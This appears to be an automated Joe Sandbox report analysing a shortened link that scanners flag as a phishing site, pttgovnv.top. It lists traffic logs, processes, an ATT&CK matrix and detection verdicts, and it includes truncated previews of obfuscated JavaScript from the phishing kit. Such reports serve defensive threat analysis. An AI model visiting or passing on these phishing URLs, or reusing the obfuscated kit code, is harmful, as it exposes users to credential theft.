Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: classification engineClassification label: mal76.phis.win@17/37@16/8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2088,i,12425730417915934961,13765664541890287119,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://is.gd/pttgovnvv"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2088,i,12425730417915934961,13765664541890287119,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://is.gd/pttgovnvv100%Avira URL Cloudphishing
http://is.gd/pttgovnvv14%VirustotalBrowse
http://is.gd/pttgovnvv100%SlashNextFraudulent Website type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
a.nel.cloudflare.com0%VirustotalBrowse
pttgovnv.top4%VirustotalBrowse
www.google.com0%VirustotalBrowse
fp2e7a.wpc.phicdn.net0%VirustotalBrowse
bg.microsoft.map.fastly.net0%VirustotalBrowse
is.gd1%VirustotalBrowse
SourceDetectionScannerLabelLink
http://fontawesome.io0%URL Reputationsafe
http://jqueryui.com0%URL Reputationsafe
http://fontawesome.io/license0%URL Reputationsafe
http://www.opensource.org/licenses/mit-license.php0%URL Reputationsafe
http://daneden.me/animate0%URL Reputationsafe
http://ianlunn.github.io/Hover/)0%Avira URL Cloudsafe
https://pttgovnv.top/help/assets/cbcdcea5JxKnW.js100%Avira URL Cloudphishing
https://pttgovnv.top/help/assets/37d8eb31JxKnW.js100%Avira URL Cloudphishing
https://pttgovnv.top/help/assets/2dd339f2kFGym.css100%Avira URL Cloudphishing
https://pttgovnv.top/help/assets/c16a2af0JxKnW.js100%Avira URL Cloudphishing
https://a.nel.cloudflare.com/report/v4?s=W9k%2Bjq46Hg7N4vTRms7HEZSAMsskhKIgDi0uYfpEvcKUMT2%2BSIXoKJoJ%2Bnwj8n1XSeKgLXDvE%2F2YXyG61vjCReK5YAUPBfJIaMqStMnZdW5alF03gbukWpGOs4%2BJPZg%3D0%Avira URL Cloudsafe
https://pttgovnv.top/help/assets/77985128JxKnW.js100%Avira URL Cloudphishing
https://pttgovnv.top/help/assets/09bf01f8JxKnW.js100%Avira URL Cloudphishing
https://pttgovnv.top/help/assets/ec21517bJxKnW.js100%Avira URL Cloudphishing
https://pttgovnv.top/api/MC45NTAzNDk0MzkyMzA0MDQ4100%Avira URL Cloudphishing
https://pttgovnv.top/help100%Avira URL Cloudphishing
https://pttgovnv.top/help/assets/index-f5457718.js100%Avira URL Cloudphishing
https://pttgovnv.top/help/assets/c27b6911JxKnW.js100%Avira URL Cloudphishing
http://ianlunn.github.io/Hover/)0%VirustotalBrowse
https://pttgovnv.top/help/assets/f3c7e6fbJxKnW.js100%Avira URL Cloudphishing
http://ianlunn.co.uk/0%Avira URL Cloudsafe
http://getbootstrap.com)0%Avira URL Cloudsafe
https://is.gd/pttgovnvv100%Avira URL Cloudphishing
https://pttgovnv.top/help1%VirustotalBrowse
https://pttgovnv.top/favicon.ico100%Avira URL Cloudphishing
https://github.com/twbs/bootstrap/blob/master/LICENSE)0%Avira URL Cloudsafe
https://is.gd/pttgovnvv6%VirustotalBrowse
https://github.com/IanLunn/Hover0%Avira URL Cloudsafe
https://pttgovnv.top/help/assets/4cd1ec68kFGym.css100%Avira URL Cloudphishing
http://pttgovnv.top/help100%Avira URL Cloudphishing
https://pttgovnv.top/help/assets/0e738ae1JxKnW.js100%Avira URL Cloudphishing
https://pttgovnv.top/help/assets/f6170fbbkFGym.css100%Avira URL Cloudphishing
http://ianlunn.co.uk/1%VirustotalBrowse
https://github.com/twbs/bootstrap/blob/master/LICENSE)0%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalseunknown
a.nel.cloudflare.com
35.190.80.1
truefalseunknown
pttgovnv.top
104.21.47.250
truefalseunknown
www.google.com
142.250.185.132
truefalseunknown
is.gd
104.25.233.53
truefalseunknown
fp2e7a.wpc.phicdn.net
192.229.221.95
truefalseunknown
NameMaliciousAntivirus DetectionReputation
https://pttgovnv.top/help/assets/cbcdcea5JxKnW.jsfalse
  • Avira URL Cloud: phishing
unknown
https://pttgovnv.top/help/assets/37d8eb31JxKnW.jstrue
  • Avira URL Cloud: phishing
unknown
https://pttgovnv.top/help/assets/2dd339f2kFGym.cssfalse
  • Avira URL Cloud: phishing
unknown
https://pttgovnv.top/help/assets/c16a2af0JxKnW.jsfalse
  • Avira URL Cloud: phishing
unknown
https://a.nel.cloudflare.com/report/v4?s=W9k%2Bjq46Hg7N4vTRms7HEZSAMsskhKIgDi0uYfpEvcKUMT2%2BSIXoKJoJ%2Bnwj8n1XSeKgLXDvE%2F2YXyG61vjCReK5YAUPBfJIaMqStMnZdW5alF03gbukWpGOs4%2BJPZg%3Dfalse
  • Avira URL Cloud: safe
unknown
https://pttgovnv.top/help/assets/77985128JxKnW.jsfalse
  • Avira URL Cloud: phishing
unknown
https://pttgovnv.top/help/assets/09bf01f8JxKnW.jsfalse
  • Avira URL Cloud: phishing
unknown
https://pttgovnv.top/help/assets/ec21517bJxKnW.jsfalse
  • Avira URL Cloud: phishing
unknown
https://pttgovnv.top/api/MC45NTAzNDk0MzkyMzA0MDQ4false
  • Avira URL Cloud: phishing
unknown
https://pttgovnv.top/helpfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: phishing
unknown
https://pttgovnv.top/help/assets/index-f5457718.jsfalse
  • Avira URL Cloud: phishing
unknown
https://pttgovnv.top/help/assets/c27b6911JxKnW.jsfalse
  • Avira URL Cloud: phishing
unknown
https://pttgovnv.top/help/assets/f3c7e6fbJxKnW.jsfalse
  • Avira URL Cloud: phishing
unknown
https://pttgovnv.top/help/false
    unknown
    https://is.gd/pttgovnvvfalse
    • 6%, Virustotal, Browse
    • Avira URL Cloud: phishing
    unknown
    https://pttgovnv.top/favicon.icofalse
    • Avira URL Cloud: phishing
    unknown
    https://pttgovnv.top/help/assets/4cd1ec68kFGym.cssfalse
    • Avira URL Cloud: phishing
    unknown
    http://pttgovnv.top/helpfalse
    • Avira URL Cloud: phishing
    unknown
    https://pttgovnv.top/help/assets/0e738ae1JxKnW.jsfalse
    • Avira URL Cloud: phishing
    unknown
    https://pttgovnv.top/help/assets/f6170fbbkFGym.cssfalse
    • Avira URL Cloud: phishing
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://fontawesome.iochromecache_64.2.drfalse
    • URL Reputation: safe
    unknown
    http://ianlunn.github.io/Hover/)chromecache_64.2.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://jqueryui.comchromecache_64.2.drfalse
    • URL Reputation: safe
    unknown
    http://fontawesome.io/licensechromecache_64.2.drfalse
    • URL Reputation: safe
    unknown
    http://www.opensource.org/licenses/mit-license.phpchromecache_64.2.drfalse
    • URL Reputation: safe
    unknown
    http://daneden.me/animatechromecache_64.2.drfalse
    • URL Reputation: safe
    unknown
    http://ianlunn.co.uk/chromecache_64.2.drfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://getbootstrap.com)chromecache_64.2.drfalse
    • Avira URL Cloud: safe
    unknown
    https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_64.2.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://github.com/IanLunn/Hoverchromecache_64.2.drfalse
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    104.21.47.250
    pttgovnv.topUnited States
    13335CLOUDFLARENETUSfalse
    142.250.185.132
    www.google.comUnited States
    15169GOOGLEUSfalse
    239.255.255.250
    unknownReserved
    unknownunknownfalse
    172.67.83.132
    unknownUnited States
    13335CLOUDFLARENETUSfalse
    35.190.80.1
    a.nel.cloudflare.comUnited States
    15169GOOGLEUSfalse
    IP
    192.168.2.7
    192.168.2.4
    192.168.2.6
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1502515
    Start date and time:2024-09-02 00:27:21 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 3m 9s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:browseurl.jbs
    Sample URL:http://is.gd/pttgovnvv
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:8
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal76.phis.win@17/37@16/8
    EGA Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 142.250.186.67, 142.250.181.238, 64.233.184.84, 34.104.35.123, 52.165.165.26, 199.232.214.172, 192.229.221.95, 13.95.31.18, 52.165.164.15, 142.250.185.99
    • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtSetInformationFile calls found.
    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
    No simulations
    No context
    No context
    No context
    No context
    No context
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:ASCII text, with very long lines (35443), with no line terminators
    Category:downloaded
    Size (bytes):35443
    Entropy (8bit):5.338743939035259
    Encrypted:false
    SSDEEP:768:8qiDiLzUsyD9YgG+UmAn2O1pRv42f9lUA7h2+JzQCjSpaZ/tgaTkU0ZAm/X1qnyw:8qOu42kEjzrpNX
    MD5:BC5635E1DA3D2182E2FDC5D1FAAE7853
    SHA1:40762193C4C05DAFAF5DD5E6DCE57608638FB847
    SHA-256:0563B1A4C7810B2DA5B4D1762D4C3281B62C0B082D4EBB6ACECD2CF88CB9BB14
    SHA-512:69C23223AAEE6A3C83133FA3C63C9A7AC361C8FDF0AF89BADF15A2D9CAFD132C0E0A42A77BD950B4539357F56082F5764897A849B9039C6F58DA7C82D9F6B938
    Malicious:false
    Reputation:low
    URL:https://pttgovnv.top/help/assets/c16a2af0JxKnW.js
    Preview:var a23_0x2208a5=a23_0x1b94;(function(_0x171a22,_0x29dadb){var _0x13e885=a23_0x1b94,_0x13bea8=_0x171a22();while(!![]){try{var _0x4cc568=parseInt(_0x13e885(0x2c5))/0x1*(parseInt(_0x13e885(0x1e8))/0x2)+parseInt(_0x13e885(0x1fb))/0x3*(-parseInt(_0x13e885(0x265))/0x4)+-parseInt(_0x13e885(0x2aa))/0x5+-parseInt(_0x13e885(0x238))/0x6+-parseInt(_0x13e885(0x1cd))/0x7*(-parseInt(_0x13e885(0x263))/0x8)+-parseInt(_0x13e885(0x26f))/0x9+parseInt(_0x13e885(0x250))/0xa*(parseInt(_0x13e885(0x2ea))/0xb);if(_0x4cc568===_0x29dadb)break;else _0x13bea8['push'](_0x13bea8['shift']());}catch(_0x334a50){_0x13bea8['push'](_0x13bea8['shift']());}}}(a23_0x1a58,0x89c68));import{l as a23_0x492e05,_ as a23_0x185bee}from'./index-f5457718.js';import{r as a23_0x5e74b1}from'./09bf01f8JxKnW.js';import{m as a23_0x5e89b9}from'./ec21517bJxKnW.js';var E=function(_0x3be998,_0x2f67eb){var _0x5590cd=a23_0x1b94;return E=Object['setPrototy'+_0x5590cd(0x2d2)]||{'__proto__':[]}instanceof Array&&function(_0x773e98,_0x1801a7){var _0x3
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:Unicode text, UTF-8 text, with very long lines (4650), with no line terminators
    Category:dropped
    Size (bytes):4708
    Entropy (8bit):5.24982094326148
    Encrypted:false
    SSDEEP:96:LhLALv2dQ13a19GeEc2mvDjHqiqV8SYn1u7+eNEgyJY47186ee7f1lV:xz5Ec1vfqiqVg1u7+eyPY47186ee7f1D
    MD5:0DA2A6E8828A9D4461A27CC813A21CD1
    SHA1:32727963FEC3E91E3951E0551ABA8AC7F45FC89D
    SHA-256:8A87A08F2C1C9AE855AACA4BD6F26B5DE44F28EA9810039F93333CC8E59FD166
    SHA-512:4F6E559C68F275E9C2F2C3C8D04392049C75856279387E74EEF2BD791DE653A81231C8B08BF86C712C905CD2C603A5298B092BCA2F7A29092AD8CD1E1F35FDA1
    Malicious:false
    Reputation:low
    Preview:const a16_0x1a0ab1=a16_0xb309;(function(_0xc62027,_0x4c3503){const _0x472517=a16_0xb309,_0x18f288=_0xc62027();while(!![]){try{const _0x10a64b=parseInt(_0x472517(0x14b))/0x1+-parseInt(_0x472517(0x13f))/0x2+parseInt(_0x472517(0x12d))/0x3+-parseInt(_0x472517(0x12a))/0x4*(parseInt(_0x472517(0x145))/0x5)+parseInt(_0x472517(0x129))/0x6*(parseInt(_0x472517(0x144))/0x7)+-parseInt(_0x472517(0x12e))/0x8*(parseInt(_0x472517(0x141))/0x9)+parseInt(_0x472517(0x132))/0xa;if(_0x10a64b===_0x4c3503)break;else _0x18f288['push'](_0x18f288['shift']());}catch(_0x2102de){_0x18f288['push'](_0x18f288['shift']());}}}(a16_0x4681,0x6ebf6));const a16_0xaa59f7=(function(){let _0x410bd1=!![];return function(_0x3e5c07,_0x31cc45){const _0x5c21e7=_0x410bd1?function(){const _0x3aa6a6=a16_0xb309;if(_0x31cc45){const _0x21f428=_0x31cc45[_0x3aa6a6(0x124)](_0x3e5c07,arguments);return _0x31cc45=null,_0x21f428;}}:function(){};return _0x410bd1=![],_0x5c21e7;};}()),a16_0x8c9795=a16_0xaa59f7(this,function(){const _0x3aa272=a16_0x
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:ASCII text, with very long lines (1965), with no line terminators
    Category:dropped
    Size (bytes):1965
    Entropy (8bit):5.287237545046552
    Encrypted:false
    SSDEEP:24:cP2k+LBK+qcy+SDaOrKhbM4O7IlH2VZ5RJR7RRRdilxXmxV4y5T0zxHI2MRRtMav:99Zqh+GOOMlH2Si35A1HpMdtZAlA
    MD5:D66FEBB5B4397732135B71831C138AFD
    SHA1:B2A462BAD03E25C4109424B80B8C3F1CC7055558
    SHA-256:E24C314BD212C166353D089356F9296351B7D31D88E7D386197443A970BA6AB5
    SHA-512:8C933EBA937FD28674F709FE7E2B342877D37F7B1A269EC09023EB98891D6E13402C0F14793DEA90C2CF1B510A6EFFCA317BBAC43EAC30A2336327EFB6D2448F
    Malicious:false
    Reputation:low
    Preview:function a0_0x1726(){const _0x590fb6=['toString','apply','1217280mFYShg','745101HtGRyz','5kGzjZf','(((.+)+)+)','search','2144133WxxWWe','remove','1368812WqIuRv','noopener','click','2226574VjkNhh','449368jzjbqt','4256976MihuCv','append','body','rel','constructo'];a0_0x1726=function(){return _0x590fb6;};return a0_0x1726();}(function(_0x3fc008,_0x3d9ca0){const _0x55189d=a0_0x1055,_0x3a6928=_0x3fc008();while(!![]){try{const _0x29b996=parseInt(_0x55189d(0xcd))/0x1+-parseInt(_0x55189d(0xc4))/0x2+parseInt(_0x55189d(0xd1))/0x3+parseInt(_0x55189d(0xd3))/0x4*(parseInt(_0x55189d(0xce))/0x5)+-parseInt(_0x55189d(0xc5))/0x6+-parseInt(_0x55189d(0xc3))/0x7+-parseInt(_0x55189d(0xcc))/0x8;if(_0x29b996===_0x3d9ca0)break;else _0x3a6928['push'](_0x3a6928['shift']());}catch(_0x571e3b){_0x3a6928['push'](_0x3a6928['shift']());}}}(a0_0x1726,0x61119));function a0_0x1055(_0xf64470,_0x4b0865){const _0x32fcc2=a0_0x1726();return a0_0x1055=function(_0xb13448,_0x57136d){_0xb13448=_0xb13448-0xc2;let _0x172600=_0x32fcc
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:ASCII text, with very long lines (1892), with no line terminators
    Category:dropped
    Size (bytes):1892
    Entropy (8bit):5.3199265720505045
    Encrypted:false
    SSDEEP:48:9MxFGgXen1yVqPNzTOv+Pgdxj2zRxpUky6fRK2:9MPGgYyV8NrgdV29vUkVfRK2
    MD5:BD7525226CFF3D63880AB3E3783107C4
    SHA1:B69F85592A127F736AD8B04F0DBB378295463C85
    SHA-256:81F05B60B2139D0F055A533BDEED2E2BC3E6142A9E779A0C644455F1BBF3F9C1
    SHA-512:9D33EACA3352F03C946DF20AEBA8ECB5430A0881A0150748E3C217400CD965FEE7F379D0D21FEA110BCE7EC43BE8BBD0230A2239EA453175C8900752B1B6FBA9
    Malicious:false
    Reputation:low
    Preview:function a24_0x5346(_0x4030c5,_0x31eecd){const _0x556825=a24_0x324b();return a24_0x5346=function(_0x3b0de7,_0xce0cb2){_0x3b0de7=_0x3b0de7-0x67;let _0x324bdb=_0x556825[_0x3b0de7];return _0x324bdb;},a24_0x5346(_0x4030c5,_0x31eecd);}function a24_0x324b(){const _0xb022b5=['1002222jJEtDH','toString','254AqdTdL','__vccOpts','5ToDzfk','1085710vVxwgb','528906UwedBM','search','constructo','54xBZeip','10320728oLohLb','353TqOCxG','(((.+)+)+)','2031164WFthFE','8CvfsLG','226828xuWwpQ'];a24_0x324b=function(){return _0xb022b5;};return a24_0x324b();}(function(_0x2907ff,_0x1577d4){const _0x4680c9=a24_0x5346,_0x3fc7cd=_0x2907ff();while(!![]){try{const _0x4b2c9c=parseInt(_0x4680c9(0x6b))/0x1*(-parseInt(_0x4680c9(0x72))/0x2)+parseInt(_0x4680c9(0x76))/0x3+-parseInt(_0x4680c9(0x6d))/0x4*(parseInt(_0x4680c9(0x74))/0x5)+parseInt(_0x4680c9(0x69))/0x6*(-parseInt(_0x4680c9(0x6f))/0x7)+parseInt(_0x4680c9(0x6e))/0x8*(parseInt(_0x4680c9(0x70))/0x9)+-parseInt(_0x4680c9(0x75))/0xa+parseInt(_0x4680c9(0x6a))/0xb;if(_0x
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:Unicode text, UTF-8 text, with very long lines (65482), with no line terminators
    Category:dropped
    Size (bytes):504521
    Entropy (8bit):5.245686837916366
    Encrypted:false
    SSDEEP:12288:NtjBw2fR0+JDC9yvd8l8hiuyaqQeuKiv7fD6oAj0BBlNAroY4DPindxfy3GOpBJ/:feSDypuKiv7fD6oAj0BBlNA2exfy1Jfn
    MD5:1E8E7D0C756EE63FCBCED0E685E20191
    SHA1:1E7AEC9DE709ADDED1E8D31B0D449C3D05B68810
    SHA-256:294E75B0E7510057A175FFF959C4EF20249DA107A3CE2CEE0D5A19CB138694E4
    SHA-512:B1E1BDC77DBA9F648B0BE98A8BB2959E135103D51D203B3714419F59E81AEE5DD53B02E206862AF80109FA5A336DFC7E707D35906514D8008ED9FF888FDE64ED
    Malicious:false
    Reputation:low
    Preview:var a38_0x3b9877=a38_0x435b;(function(_0x45151f,_0x549cdb){var _0x9ea1bf=a38_0x435b,_0x218c3b=_0x45151f();while(!![]){try{var _0x53ae22=-parseInt(_0x9ea1bf(0x3b2))/0x1+parseInt(_0x9ea1bf(0x3bb))/0x2+-parseInt(_0x9ea1bf(0x4c8))/0x3*(-parseInt(_0x9ea1bf(0x644))/0x4)+parseInt(_0x9ea1bf(0x58d))/0x5*(parseInt(_0x9ea1bf(0x690))/0x6)+-parseInt(_0x9ea1bf(0x41c))/0x7*(-parseInt(_0x9ea1bf(0x14d))/0x8)+-parseInt(_0x9ea1bf(0x51f))/0x9+parseInt(_0x9ea1bf(0x236))/0xa*(-parseInt(_0x9ea1bf(0x283))/0xb);if(_0x53ae22===_0x549cdb)break;else _0x218c3b['push'](_0x218c3b['shift']());}catch(_0x1145ce){_0x218c3b['push'](_0x218c3b['shift']());}}}(a38_0x4822,0xe70f6));function Px(){var _0x1fb5ac=a38_0x435b;import.meta[_0x1fb5ac(0x53c)],import('_')[_0x1fb5ac(0x639)](()=>0x1);async function*_0x3e9403(){}}(function(){var _0x134f30=a38_0x435b,_0x476729=(function(){var _0x4ea9eb=!![];return function(_0x3eb55f,_0x1b8e91){var _0x3870d7=_0x4ea9eb?function(){var _0x12f3a9=a38_0x435b;if(_0x1b8e91){var _0x30af4e=_0x1b8e91
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:Unicode text, UTF-8 text, with very long lines (65482), with no line terminators
    Category:downloaded
    Size (bytes):504521
    Entropy (8bit):5.245686837916366
    Encrypted:false
    SSDEEP:12288:NtjBw2fR0+JDC9yvd8l8hiuyaqQeuKiv7fD6oAj0BBlNAroY4DPindxfy3GOpBJ/:feSDypuKiv7fD6oAj0BBlNA2exfy1Jfn
    MD5:1E8E7D0C756EE63FCBCED0E685E20191
    SHA1:1E7AEC9DE709ADDED1E8D31B0D449C3D05B68810
    SHA-256:294E75B0E7510057A175FFF959C4EF20249DA107A3CE2CEE0D5A19CB138694E4
    SHA-512:B1E1BDC77DBA9F648B0BE98A8BB2959E135103D51D203B3714419F59E81AEE5DD53B02E206862AF80109FA5A336DFC7E707D35906514D8008ED9FF888FDE64ED
    Malicious:false
    Reputation:low
    URL:https://pttgovnv.top/help/assets/index-f5457718.js
    Preview:var a38_0x3b9877=a38_0x435b;(function(_0x45151f,_0x549cdb){var _0x9ea1bf=a38_0x435b,_0x218c3b=_0x45151f();while(!![]){try{var _0x53ae22=-parseInt(_0x9ea1bf(0x3b2))/0x1+parseInt(_0x9ea1bf(0x3bb))/0x2+-parseInt(_0x9ea1bf(0x4c8))/0x3*(-parseInt(_0x9ea1bf(0x644))/0x4)+parseInt(_0x9ea1bf(0x58d))/0x5*(parseInt(_0x9ea1bf(0x690))/0x6)+-parseInt(_0x9ea1bf(0x41c))/0x7*(-parseInt(_0x9ea1bf(0x14d))/0x8)+-parseInt(_0x9ea1bf(0x51f))/0x9+parseInt(_0x9ea1bf(0x236))/0xa*(-parseInt(_0x9ea1bf(0x283))/0xb);if(_0x53ae22===_0x549cdb)break;else _0x218c3b['push'](_0x218c3b['shift']());}catch(_0x1145ce){_0x218c3b['push'](_0x218c3b['shift']());}}}(a38_0x4822,0xe70f6));function Px(){var _0x1fb5ac=a38_0x435b;import.meta[_0x1fb5ac(0x53c)],import('_')[_0x1fb5ac(0x639)](()=>0x1);async function*_0x3e9403(){}}(function(){var _0x134f30=a38_0x435b,_0x476729=(function(){var _0x4ea9eb=!![];return function(_0x3eb55f,_0x1b8e91){var _0x3870d7=_0x4ea9eb?function(){var _0x12f3a9=a38_0x435b;if(_0x1b8e91){var _0x30af4e=_0x1b8e91
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:HTML document, ASCII text, with very long lines (435)
    Category:downloaded
    Size (bytes):1638
    Entropy (8bit):5.1590572904491
    Encrypted:false
